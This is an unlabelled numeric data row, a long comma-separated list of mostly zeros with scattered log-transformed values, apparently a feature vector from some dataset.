0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 1.791759469228055, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 3.5263605246161616, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.295836866004329, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 3.5263605246161616, 0.0, 0.0, 0.0, 0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 4.356708826689592, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.394449154672439, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 3.58351893845611, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 2.8398715690385097, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 1.9459101490553132, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.624972813284271, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.23410650459726, 0.0, 0.0, 0.0, 0.0, 0, 4.394449154672439, 0.0, 0.0, 0.0, 4.290459441148391, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 4.941642422609304, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 4.394449154672439, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253877, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.7412592803704001, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 3.2188758248682006, 0.0, 0.0, 0.0, 0, 0.0, 5.723585101952381, 0.0, 0.0, 2.6390573296152584, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 4.060443010546419, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.8918202981106265, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.931825632724326, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0, 0.0, 3.3322045101752034, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 4.795790545596741, 0, 0.0, 0, 0.0, 0, 0, 4.394449154672439, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253872, 0, 0.0, 0.0, 0.0, 3.93848385770662, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 3.7612001156935624, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 3.044522437723423, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.99022883006837, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 4.48863636973214, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.219507705176107, 0, 0, 0.0, 3.7376696182833684, 2.0794415416798357, 0.0, 0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 1.0986122886681098, 4.1588830833596715, 0.0, 3.4011973816621555, 0.0, 0, 0, 0, 3.1354942159291497, 0.0, 2.5649493574615367, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 4.06534854782536, 0, 0.0, 0.0, 3.044522437723423, 3.6888794541139363, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 6.42339050749462, 5.567740402508132, 0.0, 0.0, 0.0, 2.550898738446989, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.2188758248682006, 3.828641396489095, 0.0, 0.0, 0, 4.160336650881089, 0.0, 0.0, 0.0, 0, 0.0, 3.8918202981106265, 1.9459101490553132, 0.0, 0, 0.0, 0.0, 4.127134385045092, 0.0, 0, 0, 0, 4.394449154672439, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.3978952727983707, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.3322045101752034, 0, 0, 3.367295829986474, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 3.828641396489095, 0.0, 0.0, 0.0, 0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 2.550898738446989, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 3.2188758248682006, 0.0, 3.5553480614894135, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 3.7612001156935624, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.394449154672439, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 2.6390573296152584, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0.0, 4.564348191467836, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.784189633918261, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.8005740880419454, 0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 2.9957322735539913, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 2.6390573296152584, 0.0, 0.0, 0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.044522437723423, 2.995732273553991, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 1.6094379124341003, 0.0, 0, 0.0, 0, 1.9459101490553132, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 